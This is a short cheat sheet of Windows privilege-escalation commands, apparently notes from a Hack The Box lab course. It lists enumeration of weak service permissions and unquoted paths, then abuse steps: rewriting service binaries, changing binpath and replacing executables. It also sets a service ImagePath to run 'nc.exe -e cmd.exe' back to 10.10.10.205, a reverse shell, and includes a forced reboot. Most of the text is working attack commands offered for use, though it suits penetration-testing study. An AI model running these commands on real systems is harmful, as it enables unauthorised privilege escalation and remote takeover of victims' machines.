#Audit weak service permission with SharpUp
PS C:\htb> .\SharpUp.exe audit
#Searching for weak service ACLs in the Windows Registry (It is also worth searching for weak service ACLs in the Windows Registry. )
C:\htb> accesschk.exe /accepteula "mrb3n" -kvuqsw hklm\System\CurrentControlSet\services
#Manual Checks
Get-WmiObject -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select Name,DisplayName,StartMode,PathName | fl
#Check File or Directory Permissions
Get-ACL -Path 'C:\Program Files (x86)\IObit' | fl
#Check Service Permission
Get-CimInstance -ClassName Win32_Service -Filter "Name = 'IObitUnSvr'" | Select-Object *
#Abuse
Write-ServiceBinary -Name IObitUnSvr -Path "C:\Program Files (x86)\IObit\IObit.exe" -Command "" | fl
#Interact with service
Stop-Service -Name 'IObitUnSvr'
Start-Service -Name 'IObitUnSvr'
Restart-Service -Name 'IObitUnSvr'
C:\htb> sc start <ServiceName>
C:\htb> sc stop <ServiceName>
C:\htb> sc query <ServiceName>
#Shutdown machine
shutdown -r -t 0
#Modify service binpath
C:\htb> sc config <ServiceName> binpath="COMMAND-HERE"
#Modify ImagePath
PS C:\htb> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\john\Downloads\nc.exe -e cmd.exe 10.10.10.205 443"
#Replacing Service Binary example
C:\htb> cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
